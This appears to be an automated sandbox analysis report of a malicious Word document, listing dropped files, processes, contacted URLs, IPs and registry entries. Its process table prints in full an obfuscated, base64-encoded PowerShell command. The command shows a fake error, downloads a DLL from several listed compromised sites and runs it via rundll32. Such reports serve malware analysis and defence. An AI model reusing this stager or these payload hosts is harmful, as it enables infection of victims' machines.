Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
MENSAJE.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Outdoors, Outdoors
& Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads, Author:
Federico Briones, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date:
Fri Jan 22 19:01:00 2021, Last Saved Time/Date: Fri Jan 22 19:01:00 2021, Number of Pages: 1, Number of Words: 3199, Number
of Characters: 18238, Security: 8
|
initial sample
|
||
C:\Users\user\Liq8l58\Egok7ei\D64O.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4380F3E0-FFD8-4816-B513-C2DC6937B540}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A859C42-B329-43DD-B686-F01B0F0382FA}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MENSAJE.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12
2020, mtime=Wed Aug 26 14:08:12 2020, atime=Mon Jan 25 18:20:32 2021, length=171008, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7PDJ5QC81VWL5221GXZU.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$ENSAJE.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://lvnskin.com/h/IB/
|
unknown
|
||
http://nadysa.com/wp-content/Almet/
|
217.144.106.11
|
||
http://crooks-taylor.com/1676470973/1/
|
unknown
|
||
http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/
|
unknown
|
||
http://rex.tasmiragroup.com/wp-includes/un6G/
|
unknown
|
||
http://84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/
|
84.232.229.24
|
||
http://whitetheme.xyz/wp-content/q8H/
|
unknown
|
||
http://boomarketer.com/wp-content/6/
|
unknown
|
||
http://nadysa.com
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
nadysa.com
|
217.144.106.11
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
217.144.106.11
|
unknown
|
Iran (ISLAMIC Republic Of)
|
unknown
|
||
84.232.229.24
|
unknown
|
Romania
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
3%7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
<&7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
$(7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC15C
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
